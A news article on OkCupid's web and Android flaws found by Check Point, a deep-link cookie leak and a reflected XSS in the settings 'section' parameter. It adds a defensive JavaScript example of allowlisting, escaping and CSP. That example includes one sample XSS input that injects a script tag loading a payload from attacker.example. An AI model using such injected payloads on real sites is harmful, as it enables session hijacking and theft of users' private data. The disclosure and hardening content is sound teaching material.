
Popular online dating app OkCupid was found to contain several security issues. Cyber security researchers recently disclosed the flaws, which could have let malicious entities spy on users’ private information or misuse the targeted accounts.

The security issues in OkCupid’s web and Android applications, detected by researchers from Check Point, could have let cyber criminals steal user IDs, authentication tokens, and sensitive information pertaining to private subjects such as sexual orientation, preferences, email addresses, etc.

The researchers shared their findings responsibly with OkCupid, stating that not a single user was impacted by the potential vulnerability, which was identified as a part of reverse engineering of OkCupid’s Android app version 40.3.1.

The flaws in the applications also included OkCupid’s use of deep links, which could have enabled a bad actor to send a custom link, defined in the app’s manifest file, that opens a browser window with JavaScript enabled. Such requests were found to return users’ cookies.

The researchers also found a separate flaw in OkCupid’s settings functionality which makes it vulnerable to an XSS attack through the injection of malicious JavaScript code using the “section” parameter as follows: https://www.okcupid.com/settings?section=value.

This XSS attack could also be augmented further by loading a JavaScript payload from an attacker-controlled server, which would enable the attacker to steal important data such as profile information, authentication tokens, and user preferences, and transmit the stolen data back to the server.
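To show what closing this class of bug looks like, the added example below (not OkCupid's code and not taken from the Check Point research) renders a settings page from the “section” parameter twice: once by reflecting the value as-is, and once with an allowlist, output encoding, a Content-Security-Policy that refuses scripts from other origins, and an HttpOnly session cookie. The section names, markup, cookie name and sample URL are assumptions constructed for the illustration.

```javascript
// Added illustration; not OkCupid's code. Section names and markup are hypothetical.
const ALLOWED_SECTIONS = new Set(["general", "privacy", "notifications"]);

// HTML-escape a value for element text and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable pattern: the decoded query value is concatenated into markup unchanged.
function renderSettingsUnsafe(rawUrl) {
  const section = new URL(rawUrl).searchParams.get("section") || "general";
  return `<div id="settings" data-section="${section}">Section: ${section}</div>`;
}

// Hardened pattern: allowlist first, escape on output anyway, and send headers
// that limit the damage if some other injection point is missed.
function renderSettingsSafe(rawUrl) {
  const requested = new URL(rawUrl).searchParams.get("section") || "";
  const section = ALLOWED_SECTIONS.has(requested) ? requested : "general";
  const headers = {
    // Scripts may only come from the site's own origin, so a payload hosted
    // on another server is refused by the browser.
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    // HttpOnly keeps the session cookie out of reach of page JavaScript.
    "Set-Cookie": "session=PLACEHOLDER; HttpOnly; Secure; SameSite=Lax",
  };
  const safe = escapeHtml(section);
  const body = `<div id="settings" data-section="${safe}">Section: ${safe}</div>`;
  // `rejected` is a signal worth logging: a value outside the allowlist was sent.
  return { headers, body, rejected: requested !== "" && requested !== section };
}

// Constructed sample input: a section value that closes the attribute and adds markup.
const SAMPLE_URL = "https://www.okcupid.com/settings?section=" +
  encodeURIComponent('"><script src="https://attacker.example/p.js"></script>');

console.log(renderSettingsUnsafe(SAMPLE_URL)); // markup from the URL reaches the page
console.log(renderSettingsSafe(SAMPLE_URL));   // falls back to "general", rejected: true
```

The allowlist alone stops this particular parameter from being abused; the escaping, CSP and cookie flags are defence in depth for inputs that cannot be enumerated.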

The detection of vulnerabilities in the OkCupid web and mobile applications by the researchers at Check Point has helped to save several app users from having their personal data misused by malicious cyber attackers. The app might now start working on fixing these security issues so that people can continue using it without worrying about a privacy breach.